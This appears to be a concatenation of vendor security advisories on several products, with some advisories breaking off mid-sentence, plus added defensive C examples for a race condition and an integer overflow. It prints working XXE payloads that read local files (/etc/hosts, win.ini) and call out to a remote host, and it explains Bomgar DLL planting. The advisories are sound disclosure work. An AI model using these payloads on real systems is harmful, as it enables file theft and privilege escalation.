Bomgar Remote Support - Local Privilege Escalation (CVE-2017-5996)
Virtual Security Research, LLC.
https://www.vsecurity.com/
Security Advisory
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Advisory Name: Bomgar Remote Support - Local Privilege Escalation
Release Date: 2017-10-26
Application: Bomgar Remote Support
Versions: 15.2.x before 15.2.3
          16.1.x before 16.1.5
          16.2.x before 16.2.4
Severity: High/Medium
Author: Robert Wessen
Author: Mitch Kucia
Vendor Status: Update Released [2]
CVE Candidate: CVE-2017-5996
Reference: https://www.vsecurity.com/download/advisories/20171026-1.txt
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Product Description
~~~~~~~~~~~~~~~~~~~
From Bomgar's website [1]:

"The fastest, most secure way for experts to access and support the systems
that need them."

Vulnerability Overview
~~~~~~~~~~~~~~~~~~~~~~
In mid-January, VSR identified a privilege escalation vulnerability in the
Bomgar Remote Support application which can be used to escalate from any
unprivileged user to nt authority/system on Microsoft Windows 7 systems. The
vulnerability originates from an nt authority/system service being executed
from a folder with excessive permissions. The exploit requires a remote
support agent to log into the affected system.

Vulnerability Details
~~~~~~~~~~~~~~~~~~~~~
The Bomgar Remote Support agent enables remote support personnel to establish
screen sharing, access a command shell, and perform system administration
tasks on machines with the agent installed. The agent, by default, creates a
service running as the Windows LocalSystem account and creates a folder at
C:\ProgramData\bomgar-ssc-0x followed by a hexadecimal suffix. The agent is
also executed from this folder, so the folder is included in the Windows
dynamic library loader search path.

The default permissions on the C:\ProgramData folder allow all users, even
unprivileged ones, to append and write files. These permissions are inherited
by sub-directories unless explicitly overridden. These permissions are not
changed during the installation of the agent, so DLL planting/hijacking is
possible. A Trojan horse with the same name as one of the requested, but not
present, libraries can be placed inside the C:\ProgramData\bomgar-ssc-0x
folder since this folder is writeable by all users. When a remote support
person attempts to connect to the host, the malicious library will be loaded
and code can be executed as nt authority/system.

Versions Affected
~~~~~~~~~~~~~~~~~
The issue was originally discovered in version 16.1.1, although it has likely
existed since at least version 14. All testing was performed exclusively on
Windows 7; however, the vulnerability is suspected to be present on all
supported Windows platforms.

Vendor Response
~~~~~~~~~~~~~~~
The following timeline details Bomgar's response to the reported issue:

2017-02-05  VSR contacted Bomgar via several public email addresses to file
            a security report.
2017-02-06  Bomgar replied; VSR provided additional details on the
            vulnerability and Bomgar began internal triage.
2017-02-13  Bomgar confirmed reproduction and indicated a hotfix would be
            available to select customers on 2017-02-17. A patch for all
            customers would be available at a later date.
2017-03-28  Bomgar released the patch in Remote Support versions 15.2.3 [2],
            16.1.5 [3], and 16.2.4 [4].
2017-10-26  VSR advisory released.

Recommendation
~~~~~~~~~~~~~~
Upgrade all client installs to the latest version of the Bomgar Remote
Support software as soon as possible.

Common Vulnerabilities and Exposures (CVE) Information
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The Common Vulnerabilities and Exposures (CVE) project has assigned the
number CVE-2017-5996 to this issue. This is a candidate for inclusion in the
CVE list (https://cve.mitre.org), which standardizes names for security
problems.

Acknowledgments
~~~~~~~~~~~~~~~
Thanks to the Bomgar development team for a prompt response, confirmation,
and patch.

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
References:
1. https://www.bomgar.com/
2. https://www.bomgar.com/support/changelog/remote-support-15-2-3
3. https://www.bomgar.com/support/changelog/remote-support-16-1-5
4. https://www.bomgar.com/support/changelog/remote-support-1624
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

This advisory is distributed for educational purposes only with the sincere
hope that it will help promote public safety. This advisory comes with
absolutely NO WARRANTY; not even the implied warranty of merchantability or
fitness for a particular purpose. Neither Virtual Security Research, LLC nor
the author accepts any liability for any direct, indirect, or consequential
loss or damage arising
Apple iOS / OSX Foundation NSXMLParser XML eXternal Entity (XXE) Flaw
VSR Security Advisory
http://www.vsecurity.com/
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Advisory Name: Apple Foundation NSXMLParser XML eXternal Entity (XXE) Flaw
Release Date: 2014-09-17
Application: Apple iOS Foundation Framework
             Apple OS X Foundation Framework
Versions: iOS 7.0, 7.1, OS X 10.9 - 10.9.4
Severity: High
Author: George D. Gal <ggal (at) vsecurity.com>
Vendor Status: Fix Available
CVE Candidate: CVE-2014-4374
Reference: http://www.vsecurity.com/resources/advisory/20140917-1/
           http://support.apple.com/kb/HT1222
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Product Description
~~~~~~~~~~~~~~~~~~~
From [1]:

Xcode includes software development kits (SDKs) that enable you to create
applications that run on specific versions of iOS or OS X, including versions
different from the one you are developing on. This technology lets you build
a single binary that takes advantage of new features when running on a system
that supports them, and gracefully degrades when running on an older system.
Some Apple frameworks automatically modify their behavior based on the SDK an
application is built against for improved compatibility.

Vulnerability Overview
~~~~~~~~~~~~~~~~~~~~~~
In May 2014, VSR identified a vulnerability in versions 7.0 and 7.1 of the
iOS SDK whereby the NSXMLParser class resolves XML External Entities by
default despite documentation which indicates otherwise. In addition, the
setting to change the behavior of XML External Entity resolution appears to be
non-functional. This class of vulnerability, commonly known as an XXE (XML
eXternal Entity) attack, could allow an attacker to use the XML parser to
carry out attacks ranging from network port scanning, information disclosure
and denial of service to, potentially, remote file retrieval. Further review
also revealed that the Foundation Framework used in OS X 10.9.x is also
vulnerable.

The severity of this vulnerability varies. For example, in situations where
the application does not reflect user-influenced XML, retrieval of files may
be limited; however, external HTTP entities could still be used to conduct
port scans. In other scenarios, if core iOS applications transmit XML over
plaintext protocols, these protocols could potentially be intercepted to leak
the contents of any file on the mobile device. For App Store applications,
the files which could be accessed may be limited to those under the
individual chrooted application directories, or in the case of jailbroken
devices, any file on the filesystem.

Vulnerability Details
~~~~~~~~~~~~~~~~~~~~~
Apple's NSXMLParser documentation [2] indicates that external entity
resolution is disabled in the parser by default. However, inspection of
multiple applications running on iOS 7.0 and 7.1 shows that they now resolve
external entities by default, even when attempting to disable entity
resolution explicitly as shown below:

    [nsXmlParser setShouldResolveExternalEntities:NO];

The following source code demonstrates the flaw:

    - (void) doParse:(NSData *)data {
        // create and init NSXMLParser object
        NSXMLParser *nsXmlParser = [[NSXMLParser alloc] initWithData:data];

        // Why does the following not even work!?
        [nsXmlParser setShouldResolveExternalEntities:NO];

        // create and init our delegate
        VSRParser *parser = [[VSRParser alloc] initXMLParser];

        // set delegate
        [nsXmlParser setDelegate:parser];

        // parsing...
        BOOL success = [nsXmlParser parse];

        // test the result
        if (success) {
            NSLog(@"No errors");
            NSMutableArray *stuff = [parser tests];
        } else {
            NSLog(@"Error parsing document!");
        }

        [parser release];
        [nsXmlParser release];
    }

When using a vulnerable input XML file as shown below, the XML parser
attempts to perform network name resolution and access the resource defined
by the &http; entity:

    <?xml version="1.0" encoding="UTF-8"?>
    <!DOCTYPE roottag [
      <!ENTITY http SYSTEM "http://iossdk-xxe.apt.vsecurity.org/">
      <!ENTITY file SYSTEM "file:///etc/hosts">
    ]>
    <test>
      <vsr>
        <tag1>&file;</tag1>
        <tag2>&http;</tag2>
      </vsr>
    </test>

The following DNS and web server log entries demonstrate attempts to resolve
&http;:

    2014-05-19_13:26:28.31088 ... iossdk-xxe.apt.vsecurity.org
    XX.XX.XX.XX - - [19/May/2014:09:26:28 -0400] "GET /xxe HTTP/1.0" 404 446 "-" "-"

In more serious exploitation scenarios, plaintext XML communications between
a server and an iOS mobile application or OS X client application could be
intercepted and modified in transit to reference a file present on the client
device. If the device reflects this value in subsequent communications or
errors, the contents of files stored on the device could be leaked to an
attacker.

Versions Affected
~~~~~~~~~~~~~~~~~
HTC IQRD Android Permission Leakage (CVE-2012-2217)
VSR Security Advisory
http://www.vsecurity.com/
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Advisory Name: HTC IQRD Android Permission Leakage
Release Date: 2012-04-20
Application: IQRD on HTC Android Phones
Author: Dan Rosenberg <drosenberg (at) vsecurity.com>
Vendor Status: Patch Released
CVE Candidate: CVE-2012-2217
Reference: http://www.vsecurity.com/resources/advisory/20120420-1/
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Product Description
-------------------
The IQRD service is HTC's implementation of a Carrier IQ porting layer on
several HTC Android phones. Carrier IQ is a data collection framework that
may be deeply integrated into the Android application stack in order to
provide cell carriers with detailed metrics data on device and network
activity [1]. To complete the integration of Carrier IQ on a specific device,
phone manufacturers provide a porting layer that allows the Carrier IQ
service to perform specific actions that may vary by device.

Vulnerability Details
---------------------
On December 22nd, VSR identified a vulnerability in IQRD. The IQRD service
listens locally on a TCP socket bound to port 2479. This socket is intended
to allow the Carrier IQ service to request device-specific functionality from
IQRD. Unfortunately, there is no restriction or validation on which
applications may request services using this socket. As a result, any
application with the android.permission.INTERNET permission may connect to
this socket and send specially crafted messages in order to perform
potentially malicious actions. In particular, it is possible for malicious
applications to:

1. Trigger UI popup messages
2. Generate tones
3. Send arbitrary outbound SMS messages that do not appear in a user's
   outbox, facilitating toll fraud
4. Retrieve a user's Network Access Identifier (NAI) and corresponding
   password, potentially allowing rogue devices to impersonate the user on a
   CDMA network

Versions Affected
-----------------
The issue is confirmed to affect the HTC EVO 4G, HTC EVO Design 4G, EVO Shift
4G, HTC EVO 3D, HTC EVO View 4G, and HTC Hero on Sprint; and the HTC Vivid on
AT&T.

Vendor Response
---------------
The following timeline details HTC's response to the reported issue:

2011-12-22  Vulnerability reported to HTC
2011-12-28  HTC confirms receipt, replies that fix is planned for early 2012
2012-03-10  VSR requests status update
2012-03-16  HTC confirms fix has been published
2012-03-26  HTC requests clarification on finding
2012-03-26  VSR provides clarification on finding, requests confirmation on
            status of fix
2012-04-02  HTC provides confirmation of fix, requests further clarification
2012-04-02  VSR provides clarification on finding
2012-04-12  VSR provides draft advisory to HTC
2012-04-13  HTC provides corrections to advisory, requests disclosure date
2012-04-20  Coordinated disclosure

Recommendation
--------------
HTC has issued a fix that will typically be provided as an OTA update by
affected cell carriers. If the update has not automatically been installed,
it is possible to retrieve the update manually by navigating to Menu ->
Settings -> System Updates -> HTC Software Update -> Check Now.

The following software versions on Sprint are confirmed to resolve this
issue:

HTC EVO 4G:         4.67.651.3
HTC EVO Design 4G:  2.12.651.5
HTC EVO Shift 4G:   2.77.651.3
HTC EVO 3D:         2.17.651.5
HTC EVO View 4G:    2.23.651.1

The following software versions on AT&T are confirmed to resolve this issue:

HTC Vivid:          3.26.502.56

All affected devices except the HTC Hero have received an over-the-air
update. HTC and Sprint have declined to update the HTC Hero, citing its 2009
release, minimal current usage, and lack of malicious applications in the
Android Marketplace exploiting this vulnerability. Users should be aware that
devices that no longer receive updates due to switching carriers may remain
vulnerable.

Common Vulnerabilities and Exposures (CVE) Information
-----------------------------------------------------
The Common Vulnerabilities and Exposures (CVE) project has assigned the
number CVE-2012-2217 to this issue. This is a candidate for inclusion in the
CVE list (http://cve.mitre.org), which standardizes names for security
problems.

Acknowledgements
----------------
Thanks to HTC for their response and fix.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
References:
1. Carrier IQ
   http://www.carrieriq.com
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
CVE-2012-0037: libraptor - XXE in RDF/XML File Interpretation (Multiple office products affected)
VSR Security Advisory
http://www.vsecurity.com/
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Advisory Name: libraptor - XXE in RDF/XML File Interpretation
Release Date: 2012-03-24
Applications: libraptor / librdf (versions 1.x and 2.x)
Also Affected: OpenOffice 3.x, LibreOffice 3.x, AbiWord, KOffice
Author: tmorgan {a} vsecurity * com
Vendor Status: Patches available; major downstream vendors and operating
               system distributions notified
CVE Candidate: CVE-2012-0037
Reference: http://www.vsecurity.com/resources/advisory/20120324-1/
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Product Description
~~~~~~~~~~~~~~~~~~~
Raptor is a free software / Open Source C library that provides a set of
parsers and serializers that generate Resource Description Framework (RDF)
triples by parsing syntaxes or serialize the triples into a syntax. The
supported parsing syntaxes are RDF/XML, N-Quads, N-Triples, TRiG, Turtle,
RSS tag soup including all versions of RSS, Atom 1.0 and 0.3, GRDDL and
microformats for HTML, XHTML and XML and RDFa. The serializing syntaxes are
RDF/XML (regular, and abbreviated), Atom 1.0, GraphViz, JSON, N-Quads,
N-Triples, RSS 1.0 and XMP.
  -- libraptor web site [1]

libraptor is a component of librdf [2] which is used by a variety of open
source software to interpret Resource Description Framework (RDF) [3]
formats.

Vulnerability Overview
~~~~~~~~~~~~~~~~~~~~~~
In December 2011, VSR identified a vulnerability in multiple open source
office products (including OpenOffice, LibreOffice, KOffice, and AbiWord) due
to unsafe interpretation of XML files with custom entity declarations. Deeper
analysis revealed that the vulnerability was caused by acceptance of external
entities by the libraptor library, which is used by librdf and is in turn
used by these office products.

In the context of office applications, these vulnerabilities could allow for
XML External Entity (XXE) attacks resulting in file theft and a loss of user
privacy when opening potentially malicious ODF documents. For other
applications which depend on librdf or libraptor, potentially serious
consequences could result from accepting RDF/XML content from untrusted
sources, though the impact may vary widely depending on the context.

Vulnerability Details
~~~~~~~~~~~~~~~~~~~~~
Open Document Format (ODF) files consist of a collection of several different
files stored in a ZIP archive. Included in this set is a manifest.rdf file
which is formatted according to the RDF/XML representation. The RDF format is
intended to be used for storing metadata associated with specific document
elements. The manifest.rdf file can reference secondary RDF files within the
ODF file as well as external document schemas.

The RDF file parser (librdf) used by the affected office products allows DTD
specifications within the RDF files themselves. In addition, the parser
interprets external entities which may reference arbitrary external files,
HTTP and FTP resources. For instance, the following evil.rdf file was created
within a valid ODF text archive (.odt file) and referenced by the internal
manifest.rdf file:

    <?xml version="1.0" encoding="utf-8"?>
    <!DOCTYPE rdf [
      <!ENTITY file SYSTEM "file:///c:/windows/win.ini">
    ]>
    <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
      <rdf:Description rdf:about="content.xml#id1265690860">
        <ns0:comment xmlns:ns0="http://www.w3.org/2000/01/rdf-schema#">&file;</ns0:comment>
      </rdf:Description>
    </rdf:RDF>

Upon opening the malicious .odt file in OpenOffice for Windows, the
c:\windows\win.ini file was read and included in the document metadata. Upon
saving the document, this metadata was included literally in the resulting
evil.rdf file (within the .odt):

    <?xml version="1.0" encoding="utf-8"?>
    <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
      <rdf:Description rdf:about="content.xml#id1265690860">
        <ns1:comment xmlns:ns1="http://www.w3.org/2000/01/rdf-schema#">; for 16-bit app support
    [fonts]
    [extensions]
    [mci extensions]
    [files]
    [Mail]
    MAPI=1
    CMCDLLNAME32=mapi32.dll
    CMC=1
    MAPIX=1
    MAPIXVER=1.0.0.1
    OLEMessaging=1
    </ns1:comment>
      </rdf:Description>
    </rdf:RDF>

The malicious XML entities could also include URLs to attacker-controlled
HTTP or FTP resources. This would allow an attacker to determine when a
document was opened, potentially resulting in reduced privacy. However, based
on current analysis of the affected office applications, the most serious
attack scenario is likely to be:

1. Attacker posts a malicious file on a web site or sends the file to the
   victim. The file contains a form for the victim to fill out and return to
   the attacker.
2. Victim fills out the form, saves it, and sends it back to the attacker.
3. Attacker is able to read the contents of any stolen files as embedded
   metadata, simply by unzipping the
VMware Tools Multiple Vulnerabilities
VSR Security Advisory
http://www.vsecurity.com/
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Advisory Name: VMware Tools Multiple Vulnerabilities
Release Date: 2011-06-03
Application: VMware Guest Tools
Severity: High
Author: Dan Rosenberg <drosenberg (at) vsecurity.com>
Vendor Status: Patch Released [2]
CVE Candidate: CVE-2011-1787, CVE-2011-2145, CVE-2011-2146
Reference: http://www.vsecurity.com/resources/advisory/20110603-1/
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Product Description
-------------------
From [1]:

VMware Tools is a suite of utilities that enhances the performance of the
virtual machine's guest operating system and improves management of the
virtual machine. Without VMware Tools installed in your guest operating
system, guest performance lacks important functionality.

Vulnerability Overview
----------------------
On February 17th, VSR identified multiple vulnerabilities in VMware Tools, a
suite of utilities shipped by VMware with multiple product offerings, as well
as by open-source distributions as the open-vm-tools package. The first of
these issues results in a minor information disclosure vulnerability, while
the other two issues may result in privilege escalation in a VMware guest
with VMware Tools installed.

Product Background
------------------
VMware Tools includes mount.vmhgfs, a setuid-root utility that allows
unprivileged users in a guest VM to mount HGFS shared folders. Also shipped
with VMware Tools is vmware-user-suid-wrapper, a setuid-root utility which
handles initial setup to prepare for running vmware-user, which grants users
access to other utilities included with VMware Tools.

Vulnerability Details
---------------------
CVE-2011-2146: The mount.vmhgfs utility makes a call to stat() to check for
the existence and type (file, directory, etc.) of the user-supplied
mountpoint, and provides an error message if the provided argument does not
exist or is not a directory. Because mount.vmhgfs is setuid-root, a local
attacker can leverage this behavior to identify whether a given path exists
in the guest operating system and whether it is a file or directory,
potentially violating directory permissions.

CVE-2011-1787: The mount.vmhgfs utility checks that the user-provided
mountpoint is owned by the user attempting to mount an HGFS share prior to
performing the mount. However, a race condition exists between the time this
check is performed and when the mount is performed. Successful exploitation
allows a local attacker to mount HGFS shares over arbitrary, potentially
root-owned directories, subsequently allowing privilege escalation within the
guest.

CVE-2011-2145: The vmware-user-suid-wrapper utility attempts to create a
directory at /tmp/VMwareDnD. Next, it makes calls to chown() and chmod() to
make this directory root-owned and world-writable. By placing a symbolic link
at the location of this directory, vmware-user-suid-wrapper will cause the
symbolic link target to become world-writable, allowing local attackers to
escalate privileges within the guest. Only FreeBSD and Solaris versions of
VMware Tools are affected.

Versions Affected
-----------------
VMware's advisory [2] indicates the following product versions are affected:

VMware Product   Product Version   Running on   Replace with / Apply Patch
==============   ===============   ==========   ==========================
vCenter          any               Windows      not affected
Workstation      7.1.x             Linux        7.1.4 or later*
Workstation      7.1.x             Windows      7.1.4 or later*
Player           3.1.x             Linux        3.1.4 or later*
Player           3.1.x             Windows      3.1.4 or later*
AMS              any               any          not affected
Fusion           3.1.x             OSX          Fusion 3.1.3 or later*
ESXi             4.1               ESXi         ESXi410-201104402-BG*
ESXi             4.0               ESXi         ESXi400-201104402-BG*
ESXi             3.5               ESXi         ESXe350-201105402-T-SG*
ESX              4.1               ESX          ESX410-201104401-SG*
ESX              4.0               ESX          ESX400-201104401-SG*
ESX              3.5               ESX          ESX350-201105406-SG*
ESX              3.0.3             ESX          not affected

The open-vm-tools package prior to version 2011.02.23-368700 is also
affected.
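An added example, not the vendor's patch and not open-vm-tools code, contrasting the check-then-use pattern described for CVE-2011-1787 with a descriptor-based check that leaves no window to race: the directory is opened without following a final symlink, ownership is verified on the open descriptor, and that descriptor rather than the path string is what a privileged program should go on to use (fchdir/fchown/fchmod, or mounting on "." after fchdir), which also covers the /tmp/VMwareDnD symlink case. The helper names are assumptions of this example; self_check builds its own fixtures under /tmp.

```c
#define _XOPEN_SOURCE 700
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Check-then-use, as the advisory describes for mount.vmhgfs: stat() follows
 * symlinks and inspects whatever the path names at that instant. Between this
 * call returning 1 and the caller's later mount(path), the path can be
 * repointed at a directory the user does not own. Returns 1 when accepted. */
int owned_dir_by_path(const char *path, uid_t uid)
{
    struct stat st;
    if (stat(path, &st) != 0)
        return 0;
    return S_ISDIR(st.st_mode) && st.st_uid == uid;
}

/* Race-free form: open the object first, refusing a symlink in the final
 * component, then verify the object that was actually opened. The returned
 * descriptor is what privileged code should act on (fchdir(), fchown(),
 * fchmod(), or mounting on "." after fchdir()), so the object checked is the
 * object used. Returns the descriptor, or -1 with errno set. */
int open_owned_dir(const char *path, uid_t uid)
{
    int fd = open(path, O_RDONLY | O_DIRECTORY | O_NOFOLLOW);
    if (fd < 0)
        return -1;
    struct stat st;
    if (fstat(fd, &st) != 0 || !S_ISDIR(st.st_mode) || st.st_uid != uid) {
        close(fd);
        errno = EPERM;
        return -1;
    }
    return fd;
}

/* Self-check with constructed fixtures under /tmp: a directory we own, a
 * plain file inside it, and a symlink inside it pointing back at the
 * directory. Returns 0 when every case behaves as expected, otherwise the
 * number of the step that failed. */
int self_check(void)
{
    char dir[] = "/tmp/vsr-toctou-XXXXXX";
    if (mkdtemp(dir) == NULL)
        return 1;
    char file[256], link[256];
    snprintf(file, sizeof file, "%s/plain-file", dir);
    snprintf(link, sizeof link, "%s/link-to-dir", dir);
    uid_t me = getuid();
    int rc = 0, fd;

    fd = open(file, O_WRONLY | O_CREAT | O_EXCL, 0600);
    if (fd < 0) rc = 2; else close(fd);
    if (rc == 0 && symlink(dir, link) != 0) rc = 3;

    if (rc == 0) {                       /* our own directory: both accept */
        fd = open_owned_dir(dir, me);
        if (fd < 0 || !owned_dir_by_path(dir, me)) rc = 4;
        if (fd >= 0) close(fd);
    }
    if (rc == 0 && (fd = open_owned_dir(file, me)) >= 0) { close(fd); rc = 5; }     /* not a dir */
    if (rc == 0 && (fd = open_owned_dir(dir, me + 1)) >= 0) { close(fd); rc = 6; }  /* wrong owner */
    /* The symlink is where the two approaches part ways: stat() follows it
     * and happily reports the target directory, O_NOFOLLOW refuses it. */
    if (rc == 0 && !owned_dir_by_path(link, me)) rc = 7;
    if (rc == 0 && (fd = open_owned_dir(link, me)) >= 0) { close(fd); rc = 8; }

    unlink(link);
    unlink(file);
    rmdir(dir);
    return rc;
}

int main(void)
{
    int rc = self_check();
    printf(rc == 0 ? "all cases behaved as expected\n" : "step %d failed\n", rc);
    return rc;
}
```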
Vendor Response
---------------
The following timeline details VMware's response to the reported issue:

2011-02-17  VMware receives initial vulnerability report
2011-02-17  VMware security team acknowledges receipt
2011-03-04  VMware provides status update
2011-03-04  VSR initiates discussion of disclosure date
2011-03-10  VMware responds, indicates internal coordination underway
2011-03-11  VSR
Apple HFS+ Information Disclosure Vulnerability
VSR Security Advisory
http://www.vsecurity.com/
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Advisory Name: Apple HFS+ Information Disclosure Vulnerability
Release Date: 2011-03-22
Application: Apple OS X kernel (XNU)
Versions: All versions <= xnu-1504.7.4
Severity: Medium
Author: Dan Rosenberg <drosenberg (at) vsecurity (dot) com>
Vendor Status: Patch Released [2]
CVE Candidate: CVE-2011-0180
Reference: http://www.vsecurity.com/resources/advisory/20110322-1/
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Product Description
-------------------
From [1]:

Beneath the appealing, easy-to-use interface of Mac OS X is a rock-solid,
UNIX-based foundation that is engineered for stability, reliability, and
performance. The kernel environment is built on top of Mach 3.0 and provides
high-performance networking facilities and support for multiple, integrated
file systems.

Vulnerability Overview
----------------------
On June 30th, VSR identified a vulnerability in HFS+, a filesystem
implemented in the OS X XNU kernel. HFS+ is the default filesystem in use on
many installations of the Mac OS X operating system. By exploiting this
vulnerability, an unprivileged user with local access to a machine using HFS+
may be able to read raw filesystem data, bypassing file permissions and
resulting in information disclosure.

Vulnerability Details
---------------------
Users may interact with the filesystem using the standard ioctl interface.
HFS+ features an ioctl called F_READBOOTSTRAP that allows unprivileged users
to read raw data from an HFS+ filesystem. The ioctl intends to ensure that
this data is restricted to the first 1024 bytes, where bootstrap information
is stored. However, due to an integer overflow in the code that attempts to
enforce this restriction, it is possible for an unprivileged user to use this
ioctl to read large portions of filesystem data outside of this byte range,
leading to an information disclosure vulnerability.

The vulnerable check reads as follows, in bsd/hfs/hfs_readwrite.c:

    if (user_bootstrapp->fbt_offset + user_bootstrapp->fbt_length > 1024)
        return EINVAL;

If a user provides values for the fbt_offset and fbt_length members such
that their sum overflows and wraps around to an integer less than 1024,
portions of filesystem data outside the intended range will be read and
returned to the user.

Proof-of-Concept Exploit
------------------------
VSR has developed a proof-of-concept exploit [3] to both demonstrate the
severity of this issue as well as allow users and administrators to verify
the existence of the vulnerability. The exploit leverages the integer
overflow to read arbitrary amounts of filesystem data at a negative offset
from the end of the filesystem.

Versions Affected
-----------------
Testing was performed on Darwin Kernel Version 10.4.0, xnu-1504.7.4~1, but
review of older source code suggests that all versions of OS X may be
affected.
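An added user-space model of the check quoted above (example code, not from the advisory or the XNU source): the field types follow user_fbootstraptransfer_t as assumed here, a signed 64-bit offset and an unsigned 64-bit length, so the kernel's addition is carried out unsigned and wraps modulo 2^64; the second function shows the per-operand range checks that reject both the negative-offset and the oversized-length wrap. The struct and function names are this example's own.

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>

/* Modelled after XNU's user_fbootstraptransfer_t; the field types are
 * assumed here. The user buffer pointer is omitted since only the bounds
 * check is of interest. */
struct bootstrap_xfer {
    int64_t  fbt_offset;   /* off_t: signed */
    uint64_t fbt_length;   /* user_size_t: unsigned */
};

#define BOOTSTRAP_LIMIT 1024   /* bytes of bootstrap data the ioctl may touch */

/* Small constructor so a request can be written as xfer(offset, length). */
struct bootstrap_xfer xfer(int64_t offset, uint64_t length)
{
    struct bootstrap_xfer x = { offset, length };
    return x;
}

/* The pre-fix check as quoted in the advisory. The usual arithmetic
 * conversions turn int64_t + uint64_t into an unsigned 64-bit addition, so
 * the sum is reduced modulo 2^64: a negative offset, or a length close to
 * UINT64_MAX, wraps the sum back below the limit and the request passes even
 * though it covers data far outside the first 1024 bytes. */
bool vulnerable_check_accepts(struct bootstrap_xfer x)
{
    if (x.fbt_offset + x.fbt_length > BOOTSTRAP_LIMIT)
        return false;          /* the kernel returns EINVAL here */
    return true;
}

/* Safe form: bound each operand on its own before combining them. Once both
 * lie in [0, 1024] the addition cannot wrap, and the final comparison really
 * does confine the transfer to the bootstrap area. */
bool safe_check_accepts(struct bootstrap_xfer x)
{
    if (x.fbt_offset < 0 || x.fbt_offset > BOOTSTRAP_LIMIT)
        return false;
    if (x.fbt_length > BOOTSTRAP_LIMIT)
        return false;
    if ((uint64_t)x.fbt_offset + x.fbt_length > BOOTSTRAP_LIMIT)
        return false;
    return true;
}

int main(void)
{
    /* Constructed requests: a legitimate one, a plainly oversized one, and
     * the two wrap-around shapes (negative offset, huge length). */
    struct bootstrap_xfer cases[] = {
        xfer(0, 1024), xfer(1000, 100), xfer(-4096, 4608), xfer(1000, UINT64_MAX - 499),
    };
    for (size_t i = 0; i < sizeof cases / sizeof cases[0]; i++)
        printf("offset=%lld length=%llu  vulnerable:%s  safe:%s\n",
               (long long)cases[i].fbt_offset, (unsigned long long)cases[i].fbt_length,
               vulnerable_check_accepts(cases[i]) ? "accept" : "reject",
               safe_check_accepts(cases[i]) ? "accept" : "reject");
    return 0;
}
```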
Vendor Response
---------------
The following timeline details Apple's response to the reported issue:

2010-07-01  Apple was provided a draft advisory
2010-07-02  Apple acknowledges receipt of advisory
2010-07-22  Request for confirmation of issue
2010-07-25  Apple confirms issue under investigation
2010-09-02  Request for status update
2010-09-02  Apple confirms fix is being tested
2010-10-13  Request for status update
2010-10-14  Apple confirms fix is planned for undetermined date
2010-11-16  Request for status update
2010-11-16  Apple confirms ship date is set for early 2011
2011-01-18  Request for status update
2011-01-18  Apple confirms ship date for early April
2011-03-21  Apple publishes fix

Apple's advisory may be obtained at:
http://support.apple.com/kb/HT4581

Recommendation
--------------
Apply the fix provided by Apple's OS X security update [2].

Common Vulnerabilities and Exposures (CVE) Information
-----------------------------------------------------
The Common Vulnerabilities and Exposures (CVE) project has assigned the
number CVE-2011-0180 to this issue. This is a candidate for inclusion in the
CVE list (http://cve.mitre.org), which standardizes names for security
problems.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
References:
1. Darwin and Core Technologies
   http://developer.apple.com/mac/library/documentation/MacOSX/Conceptual/OSX_Technology_Overview/SystemTechnology/SystemTechnology.html
2. Apple Security Update 2011-001
   http://support.apple.com/kb/HT4581
3. HFS+ F_READBOOTSTRAP information disclosure exploit
   http://www.vsecurity.com/download/tools/hfs-dump.c
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
OpenOffice.org Multiple Memory Corruption Vulnerabilities
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

VSR Security Advisory
http://www.vsecurity.com/

